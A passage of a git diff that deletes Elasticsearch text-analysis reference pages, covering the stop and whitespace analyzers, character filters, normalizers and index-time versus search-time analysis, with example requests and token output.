compare_analyzers: {index: standard_example, first: standard, second: rebuilt_standard}\nendyaml\n/] -<1> You'd add any token filters after `lowercase`. diff --git a/docs/reference/analysis/analyzers/stop-analyzer.asciidoc b/docs/reference/analysis/analyzers/stop-analyzer.asciidoc deleted file mode 100644 index 5dc65268c7b..00000000000 --- a/docs/reference/analysis/analyzers/stop-analyzer.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[[analysis-stop-analyzer]] -=== Stop analyzer -++++ -Stop -++++ - -The `stop` analyzer is the same as the <> -but adds support for removing stop words. It defaults to using the -`_english_` stop words. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "stop", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ quick, brown, foxes, jumped, over, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `stop` analyzer accepts the following parameters: - -[horizontal] -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_english_`. - -`stopwords_path`:: - - The path to a file containing stop words. This path is relative to the - Elasticsearch `config` directory. - - -See the <> for more information -about stop word configuration. - -[discrete] -=== Example configuration - -In this example, we configure the `stop` analyzer to use a specified list of -words as stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_stop_analyzer": { - "type": "stop", - "stopwords": ["the", "over"] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_stop_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ quick, brown, foxes, jumped, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Definition - -It consists of: - -Tokenizer:: -* <> - -Token filters:: -* <> - -If you need to customize the `stop` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`stop` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /stop_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": "_english_" <1> - } - }, - "analyzer": { - "rebuilt_stop": { - "tokenizer": "lowercase", - "filter": [ - "english_stop" <2> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: stop_example, first: stop, second: rebuilt_stop}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> You'd add any token filters after `english_stop`. diff --git a/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc b/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc deleted file mode 100644 index 3af4f140b58..00000000000 --- a/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -[[analysis-whitespace-analyzer]] -=== Whitespace analyzer -++++ -Whitespace -++++ - -The `whitespace` analyzer breaks text into terms whenever it encounters a -whitespace character. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "whitespace", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "Brown-Foxes", - "start_offset": 12, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "word", - "position": 8 - }, - { - "token": "bone.", - "start_offset": 51, - "end_offset": 56, - "type": "word", - "position": 9 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown-Foxes, jumped, over, the, lazy, dog's, bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `whitespace` analyzer is not configurable. - -[discrete] -=== Definition - -It consists of: - -Tokenizer:: -* <> - -If you need to customize the `whitespace` analyzer then you need to -recreate it as a `custom` analyzer and modify it, usually by adding -token filters. This would recreate the built-in `whitespace` analyzer -and you can use it as a starting point for further customization: - -[source,console] ----------------------------------------------------- -PUT /whitespace_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_whitespace": { - "tokenizer": "whitespace", - "filter": [ <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: whitespace_example, first: whitespace, second: rebuilt_whitespace}\nendyaml\n/] - -<1> You'd add any token filters here. diff --git a/docs/reference/analysis/anatomy.asciidoc b/docs/reference/analysis/anatomy.asciidoc deleted file mode 100644 index 22e7ffda667..00000000000 --- a/docs/reference/analysis/anatomy.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[analyzer-anatomy]] -=== Anatomy of an analyzer - -An _analyzer_ -- whether built-in or custom -- is just a package which -contains three lower-level building blocks: _character filters_, -_tokenizers_, and _token filters_. - -The built-in <> pre-package these building -blocks into analyzers suitable for different languages and types of text. -Elasticsearch also exposes the individual building blocks so that they can be -combined to define new <> analyzers. - -[[analyzer-anatomy-character-filters]] -==== Character filters - -A _character filter_ receives the original text as a stream of characters and -can transform the stream by adding, removing, or changing characters. For -instance, a character filter could be used to convert Hindu-Arabic numerals -(٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin equivalents (0123456789), or to strip HTML -elements like `` from the stream. - -An analyzer may have *zero or more* <>, -which are applied in order. - -[[analyzer-anatomy-tokenizer]] -==== Tokenizer - -A _tokenizer_ receives a stream of characters, breaks it up into individual -_tokens_ (usually individual words), and outputs a stream of _tokens_. For -instance, a <> tokenizer breaks -text into tokens whenever it sees any whitespace. It would convert the text -`"Quick brown fox!"` into the terms `[Quick, brown, fox!]`. - -The tokenizer is also responsible for recording the order or _position_ of -each term and the start and end _character offsets_ of the original word which -the term represents. - -An analyzer must have *exactly one* <>. - -[[analyzer-anatomy-token-filters]] -==== Token filters - -A _token filter_ receives the token stream and may add, remove, or change -tokens. For example, a <> token -filter converts all tokens to lowercase, a -<> token filter removes common words -(_stop words_) like `the` from the token stream, and a -<> token filter introduces synonyms -into the token stream. - -Token filters are not allowed to change the position or character offsets of -each token. - -An analyzer may have *zero or more* <>, -which are applied in order. \ No newline at end of file diff --git a/docs/reference/analysis/charfilters.asciidoc b/docs/reference/analysis/charfilters.asciidoc deleted file mode 100644 index 97fe4fd266b..00000000000 --- a/docs/reference/analysis/charfilters.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[analysis-charfilters]] -== Character filters reference - -_Character filters_ are used to preprocess the stream of characters before it -is passed to the <>. - -A character filter receives the original text as a stream of characters and -can transform the stream by adding, removing, or changing characters. For -instance, a character filter could be used to convert Hindu-Arabic numerals -(٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin equivalents (0123456789), or to strip HTML -elements like `` from the stream. - - -Elasticsearch has a number of built in character filters which can be used to build -<>. - -<>:: - -The `html_strip` character filter strips out HTML elements like `` and -decodes HTML entities like `&`. - -<>:: - -The `mapping` character filter replaces any occurrences of the specified -strings with the specified replacements. - -<>:: - -The `pattern_replace` character filter replaces any characters matching a -regular expression with the specified replacement. - -include::charfilters/htmlstrip-charfilter.asciidoc[] - -include::charfilters/mapping-charfilter.asciidoc[] - -include::charfilters/pattern-replace-charfilter.asciidoc[] diff --git a/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc b/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc deleted file mode 100644 index 237339d9744..00000000000 --- a/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc +++ /dev/null @@ -1,130 +0,0 @@ -[[analysis-htmlstrip-charfilter]] -=== HTML strip character filter -++++ -HTML strip -++++ - -Strips HTML elements from a text and replaces HTML entities with their decoded -value (e.g, replaces `&` with `&`). - -The `html_strip` filter uses Lucene's -{lucene-analysis-docs}/charfilter/HTMLStripCharFilter.html[HTMLStripCharFilter]. - -[[analysis-htmlstrip-charfilter-analyze-ex]] -==== Example - -The following <> request uses the -`html_strip` filter to change the text `

I'm so happy!

` to -`\nI'm so happy!\n`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "char_filter": [ - "html_strip" - ], - "text": "

I'm so happy!

" -} ----- - -The filter produces the following text: - -[source,text] ----- -[ \nI'm so happy!\n ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "\nI'm so happy!\n", - "start_offset": 0, - "end_offset": 32, - "type": "word", - "position": 0 - } - ] -} ----- -//// - -[[analysis-htmlstrip-charfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`html_strip` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "char_filter": [ - "html_strip" - ] - } - } - } - } -} ----- - -[[analysis-htmlstrip-charfilter-configure-parms]] -==== Configurable parameters - -`escaped_tags`:: -(Optional, array of strings) -Array of HTML elements without enclosing angle brackets (`< >`). The filter -skips these HTML elements when stripping HTML from the text. For example, a -value of `[ "p" ]` skips the `

` HTML element. - -[[analysis-htmlstrip-charfilter-customize]] -==== Customize - -To customize the `html_strip` filter, duplicate it to create the basis for a new -custom character filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`html_strip` filter, `my_custom_html_strip_char_filter`. - -The `my_custom_html_strip_char_filter` filter skips the removal of the `` -HTML element. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "char_filter": [ - "my_custom_html_strip_char_filter" - ] - } - }, - "char_filter": { - "my_custom_html_strip_char_filter": { - "type": "html_strip", - "escaped_tags": [ - "b" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc b/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc deleted file mode 100644 index b1f2f0900dc..00000000000 --- a/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ -[[analysis-mapping-charfilter]] -=== Mapping character filter -++++ -Mapping -++++ - -The `mapping` character filter accepts a map of keys and values. Whenever it -encounters a string of characters that is the same as a key, it replaces them -with the value associated with that key. - -Matching is greedy; the longest pattern matching at a given point wins. -Replacements are allowed to be the empty string. - -The `mapping` filter uses Lucene's -{lucene-analysis-docs}/charfilter/MappingCharFilter.html[MappingCharFilter]. - -[[analysis-mapping-charfilter-analyze-ex]] -==== Example - -The following <> request uses the `mapping` filter -to convert Hindu-Arabic numerals (٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin -equivalents (0123456789), changing the text `My license plate is ٢٥٠١٥` to -`My license plate is 25015`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "char_filter": [ - { - "type": "mapping", - "mappings": [ - "٠ => 0", - "١ => 1", - "٢ => 2", - "٣ => 3", - "٤ => 4", - "٥ => 5", - "٦ => 6", - "٧ => 7", - "٨ => 8", - "٩ => 9" - ] - } - ], - "text": "My license plate is ٢٥٠١٥" -} ----- - -The filter produces the following text: - -[source,text] ----- -[ My license plate is 25015 ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "My license plate is 25015", - "start_offset": 0, - "end_offset": 25, - "type": "word", - "position": 0 - } - ] -} ----- -//// - -[[analysis-mapping-charfilter-configure-parms]] -==== Configurable parameters - -`mappings`:: -(Required*, array of strings) -Array of mappings, with each element having the form `key => value`. -+ -Either this or the `mappings_path` parameter must be specified. - -`mappings_path`:: -(Required*, string) -Path to a file containing `key => value` mappings. -+ -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. -+ -Either this or the `mappings` parameter must be specified. - -[[analysis-mapping-charfilter-customize]] -==== Customize and add to an analyzer - -To customize the `mappings` filter, duplicate it to create the basis for a new -custom character filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`mappings` filter, `my_mappings_char_filter`. - -The `my_mappings_char_filter` filter replaces the `:)` and `:(` emoticons -with a text equivalent. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_mappings_char_filter" - ] - } - }, - "char_filter": { - "my_mappings_char_filter": { - "type": "mapping", - "mappings": [ - ":) => _happy_", - ":( => _sad_" - ] - } - } - } - } -} ----- - -The following <> request uses the custom -`my_mappings_char_filter` to replace `:(` with `_sad_` in -the text `I'm delighted about it :(`. - -[source,console] ----- -GET /my-index-000001/_analyze -{ - "tokenizer": "keyword", - "char_filter": [ "my_mappings_char_filter" ], - "text": "I'm delighted about it :(" -} ----- -// TEST[continued] - -The filter produces the following text: - -[source,text] ---------------------------- -[ I'm delighted about it _sad_ ] ---------------------------- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "I'm delighted about it _sad_", - "start_offset": 0, - "end_offset": 25, - "type": "word", - "position": 0 - } - ] -} ----- -//// diff --git a/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc b/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc deleted file mode 100644 index 7951cfec972..00000000000 --- a/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc +++ /dev/null @@ -1,267 +0,0 @@ -[[analysis-pattern-replace-charfilter]] -=== Pattern replace character filter -++++ -Pattern replace -++++ - -The `pattern_replace` character filter uses a regular expression to match -characters which should be replaced with the specified replacement string. -The replacement string can refer to capture groups in the regular expression. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern replace character filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Configuration - -The `pattern_replace` character filter accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression]. Required. - -`replacement`:: - - The replacement string, which can reference capture groups using the - `$1`..`$9` syntax, as explained - https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#appendReplacement-java.lang.StringBuffer-java.lang.String-[here]. - -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. - -[discrete] -=== Example configuration - -In this example, we configure the `pattern_replace` character filter to -replace any embedded dashes in numbers with underscores, i.e `123-456-789` -> -`123_456_789`: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_char_filter" - ] - } - }, - "char_filter": { - "my_char_filter": { - "type": "pattern_replace", - "pattern": "(\\d+)-(?=\\d)", - "replacement": "$1_" - } - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "My credit card is 123-456-789" -} ----------------------------- -// TEST[s/\$1//] -// the test framework doesn't like the $1 so we just throw it away rather than -// try to get it to work properly. At least we are still testing the charfilter. - -The above example produces the following terms: - -[source,text] ---------------------------- -[ My, credit, card, is, 123_456_789 ] ---------------------------- - -WARNING: Using a replacement string that changes the length of the original -text will work for search purposes, but will result in incorrect highlighting, -as can be seen in the following example. - -This example inserts a space whenever it encounters a lower-case letter -followed by an upper-case letter (i.e. `fooBarBaz` -> `foo Bar Baz`), allowing -camelCase words to be queried individually: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_char_filter" - ], - "filter": [ - "lowercase" - ] - } - }, - "char_filter": { - "my_char_filter": { - "type": "pattern_replace", - "pattern": "(?<=\\p{Lower})(?=\\p{Upper})", - "replacement": " " - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "my_analyzer" - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The fooBarBaz method" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "foo", - "start_offset": 4, - "end_offset": 6, - "type": "", - "position": 1 - }, - { - "token": "bar", - "start_offset": 7, - "end_offset": 9, - "type": "", - "position": 2 - }, - { - "token": "baz", - "start_offset": 10, - "end_offset": 13, - "type": "", - "position": 3 - }, - { - "token": "method", - "start_offset": 14, - "end_offset": 20, - "type": "", - "position": 4 - } - ] -} ----------------------------- - -///////////////////// - -The above returns the following terms: - -[source,text] ----------------------------- -[ the, foo, bar, baz, method ] ----------------------------- - -Querying for `bar` will find the document correctly, but highlighting on the -result will produce incorrect highlights, because our character filter changed -the length of the original text: - -[source,console] ----------------------------- -PUT my-index-00001/_doc/1?refresh -{ - "text": "The fooBarBaz method" -} - -GET my-index-00001/_search -{ - "query": { - "match": { - "text": "bar" - } - }, - "highlight": { - "fields": { - "text": {} - } - } -} ----------------------------- -// TEST[continued] - -The output from the above is: - -[source,console-result] ----------------------------- -{ - "timed_out": false, - "took": $body.took, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.2876821, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.2876821, - "_source": { - "text": "The fooBarBaz method" - }, - "highlight": { - "text": [ - "The fooBarBaz method" <1> - ] - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] - -<1> Note the incorrect highlight. diff --git a/docs/reference/analysis/concepts.asciidoc b/docs/reference/analysis/concepts.asciidoc deleted file mode 100644 index 9ff605227b8..00000000000 --- a/docs/reference/analysis/concepts.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[analysis-concepts]] -== Text analysis concepts -++++ -Concepts -++++ - -This section explains the fundamental concepts of text analysis in {es}. - -* <> -* <> -* <> -* <> - -include::anatomy.asciidoc[] -include::index-search-time.asciidoc[] -include::stemming.asciidoc[] -include::token-graphs.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/configure-text-analysis.asciidoc b/docs/reference/analysis/configure-text-analysis.asciidoc deleted file mode 100644 index ddafc257e94..00000000000 --- a/docs/reference/analysis/configure-text-analysis.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[configure-text-analysis]] -== Configure text analysis - -By default, {es} uses the <> for -all text analysis. The `standard` analyzer gives you out-of-the-box support for -most natural languages and use cases. If you chose to use the `standard` -analyzer as-is, no further configuration is needed. - -If the standard analyzer does not fit your needs, review and test {es}'s other -built-in <>. Built-in analyzers don't -require configuration, but some support options that can be used to adjust their -behavior. For example, you can configure the `standard` analyzer with a list of -custom stop words to remove. - -If no built-in analyzer fits your needs, you can test and create a custom -analyzer. Custom analyzers involve selecting and combining different -<>, giving you greater control over -the process. - -* <> -* <> -* <> -* <> - - -include::testing.asciidoc[] - -include::analyzers/configuring.asciidoc[] - -include::analyzers/custom-analyzer.asciidoc[] - -include::specify-analyzer.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/index-search-time.asciidoc b/docs/reference/analysis/index-search-time.asciidoc deleted file mode 100644 index 41b922c2e95..00000000000 --- a/docs/reference/analysis/index-search-time.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ -[[analysis-index-search-time]] -=== Index and search analysis - -Text analysis occurs at two times: - -Index time:: -When a document is indexed, any <> field values are analyzed. - -Search time:: -When running a <> on a `text` field, -the query string (the text the user is searching for) is analyzed. -+ -Search time is also called _query time_. - -The analyzer, or set of analysis rules, used at each time is called the _index -analyzer_ or _search analyzer_ respectively. - -[[analysis-same-index-search-analyzer]] -==== How the index and search analyzer work together - -In most cases, the same analyzer should be used at index and search time. This -ensures the values and query strings for a field are changed into the same form -of tokens. In turn, this ensures the tokens match as expected during a search. - -.**Example** -[%collapsible] -==== - -A document is indexed with the following value in a `text` field: - -[source,text] ------- -The QUICK brown foxes jumped over the dog! ------- - -The index analyzer for the field converts the value into tokens and normalizes -them. In this case, each of the tokens represents a word: - -[source,text] ------- -[ quick, brown, fox, jump, over, dog ] ------- - -These tokens are then indexed. - -Later, a user searches the same `text` field for: - -[source,text] ------- -"Quick fox" ------- - -The user expects this search to match the sentence indexed earlier, -`The QUICK brown foxes jumped over the dog!`. - -However, the query string does not contain the exact words used in the -document's original text: - -* `quick` vs `QUICK` -* `fox` vs `foxes` - -To account for this, the query string is analyzed using the same analyzer. This -analyzer produces the following tokens: - -[source,text] ------- -[ quick, fox ] ------- - -To execute the search, {es} compares these query string tokens to the tokens -indexed in the `text` field. - -[options="header"] -|=== -|Token | Query string | `text` field -|`quick` | X | X -|`brown` | | X -|`fox` | X | X -|`jump` | | X -|`over` | | X -|`dog` | | X -|=== - -Because the field value and query string were analyzed in the same way, they -created similar tokens. The tokens `quick` and `fox` are exact matches. This -means the search matches the document containing `"The QUICK brown foxes jumped -over the dog!"`, just as the user expects. -==== - -[[different-analyzers]] -==== When to use a different search analyzer - -While less common, it sometimes makes sense to use different analyzers at index -and search time. To enable this, {es} allows you to -<>. - -Generally, a separate search analyzer should only be specified when using the -same form of tokens for field values and query strings would create unexpected -or irrelevant search matches. - -[[different-analyzer-ex]] -.*Example* -[%collapsible] -==== -{es} is used to create a search engine that matches only words that start with -a provided prefix. For instance, a search for `tr` should return `tram` or -`trope`—but never `taxi` or `bat`. - -A document is added to the search engine's index; this document contains one -such word in a `text` field: - -[source,text] ------- -"Apple" ------- - -The index analyzer for the field converts the value into tokens and normalizes -them. In this case, each of the tokens represents a potential prefix for -the word: - -[source,text] ------- -[ a, ap, app, appl, apple] ------- - -These tokens are then indexed. - -Later, a user searches the same `text` field for: - -[source,text] ------- -"appli" ------- - -The user expects this search to match only words that start with `appli`, -such as `appliance` or `application`. The search should not match `apple`. - -However, if the index analyzer is used to analyze this query string, it would -produce the following tokens: - -[source,text] ------- -[ a, ap, app, appl, appli ] ------- - -When {es} compares these query string tokens to the ones indexed for `apple`, -it finds several matches. - -[options="header"] -|=== -|Token | `appli` | `apple` -|`a` | X | X -|`ap` | X | X -|`app` | X | X -|`appl` | X | X -|`appli` | | X -|=== - -This means the search would erroneously match `apple`. Not only that, it would -match any word starting with `a`. - -To fix this, you can specify a different search analyzer for query strings used -on the `text` field. - -In this case, you could specify a search analyzer that produces a single token -rather than a set of prefixes: - -[source,text] ------- -[ appli ] ------- - -This query string token would only match tokens for words that start with -`appli`, which better aligns with the user's search expectations. -==== diff --git a/docs/reference/analysis/normalizers.asciidoc b/docs/reference/analysis/normalizers.asciidoc deleted file mode 100644 index 6646ffb2bdd..00000000000 --- a/docs/reference/analysis/normalizers.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[analysis-normalizers]] -== Normalizers - -Normalizers are similar to analyzers except that they may only emit a single -token. As a consequence, they do not have a tokenizer and only accept a subset -of the available char filters and token filters. Only the filters that work on -a per-character basis are allowed. For instance a lowercasing filter would be -allowed, but not a stemming filter, which needs to look at the keyword as a -whole. The current list of filters that can be used in a normalizer is -following: `arabic_normalization`, `asciifolding`, `bengali_normalization`, -`cjk_width`, `decimal_digit`, `elision`, `german_normalization`, -`hindi_normalization`, `indic_normalization`, `lowercase`, -`persian_normalization`, `scandinavian_folding`, `serbian_normalization`, -`sorani_normalization`, `uppercase`. - -Elasticsearch ships with a `lowercase` built-in normalizer. For other forms of -normalization a custom configuration is required. - -[discrete] -=== Custom normalizers - -Custom normalizers take a list of -<> and a list of -<>. - -[source,console] --------------------------------- -PUT index -{ - "settings": { - "analysis": { - "char_filter": { - "quote": { - "type": "mapping", - "mappings": [ - "« => \"", - "» => \"" - ] - } - }, - "normalizer": { - "my_normalizer": { - "type": "custom", - "char_filter": ["quote"], - "filter": ["lowercase", "asciifolding"] - } - } - } - }, - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "normalizer": "my_normalizer" - } - } - } -} --------------------------------- diff --git a/docs/reference/analysis/overview.asciidoc b/docs/reference/analysis/overview.asciidoc deleted file mode 100644 index 8cf5a10ae8a..00000000000 --- a/docs/reference/analysis/overview.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[analysis-overview]] -== Text analysis overview -++++ -Overview -++++ - -Text analysis enables {es} to perform full-text search, where the search returns -all _relevant_ results rather than just exact matches. - -If you search for `Quick fox jumps`, you probably want the document that -contains `A quick brown fox jumps over the lazy dog`, and you might also want -documents that contain related words like `fast fox` or `foxes leap`. - -[discrete] -[[tokenization]] -=== Tokenization - -Analysis makes full-text search possible through _tokenization_: breaking a text -down into smaller chunks, called _tokens_. In most cases, these tokens are -individual words. - -If you index the phrase `the quick brown fox jumps` as a single string and the -user searches for `quick fox`, it isn't considered a match. However, if you -tokenize the phrase and index each word separately, the terms in the query -string can be looked up individually. This means they can be matched by searches -for `quick fox`, `fox brown`, or other variations. - -[discrete] -[[normalization]] -=== Normalization - -Tokenization enables matching on individual terms, but each token is still -matched literally. This means: - -* A search for `Quick` would not match `quick`, even though you likely want -either term to match the other - -* Although `fox` and `foxes` share the same root word, a search for `foxes` -would not match `fox` or vice versa. - -* A search for `jumps` would not match `leaps`. While they don't share a root -word, they are synonyms and have a similar meaning. - -To solve these problems, text analysis can _normalize_ these tokens into a -standard format. This allows you to match tokens that are not exactly the same -as the search terms, but similar enough to still be relevant. For example: - -* `Quick` can be lowercased: `quick`. - -* `foxes` can be _stemmed_, or reduced to its root word: `fox`. - -* `jump` and `leap` are synonyms and can be indexed as a single word: `jump`. - -To ensure search terms match these words as intended, you can apply the same -tokenization and normalization rules to the query string. For example, a search -for `Foxes leap` can be normalized to a search for `fox jump`. - -[discrete] -[[analysis-customization]] -=== Customize text analysis - -Text analysis is performed by an <>, a set of rules -that govern the entire process. - -{es} includes a default analyzer, called the -<>, which works well for most use -cases right out of the box. - -If you want to tailor your search experience, you can choose a different -<> or even -<>. A custom analyzer gives you -control over each step of the analysis process, including: - -* Changes to the text _before_ tokenization - -* How text is converted to tokens - -* Normalization changes made to tokens before indexing or search \ No newline at end of file diff --git a/docs/reference/analysis/specify-analyzer.asciidoc b/docs/reference/analysis/specify-analyzer.asciidoc deleted file mode 100644 index d3114a74984..00000000000 --- a/docs/reference/analysis/specify-analyzer.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[[specify-analyzer]] -=== Specify an analyzer - -{es} offers a variety of ways to specify built-in or custom analyzers: - -* By `text` field, index, or query -* For <> - -[TIP] -.Keep it simple -==== -The flexibility to specify analyzers at different levels and for different times -is great... _but only when it's needed_. - -In most cases, a simple approach works best: Specify an analyzer for each -`text` field, as outlined in <>. - -This approach works well with {es}'s default behavior, letting you use the same -analyzer for indexing and search. It also lets you quickly see which analyzer -applies to which field using the <>. - -If you don't typically create mappings for your indices, you can use -<> to achieve a similar effect. -==== - -[[specify-index-time-analyzer]] -==== How {es} determines the index analyzer - -{es} determines which index analyzer to use by checking the following parameters -in order: - -. The 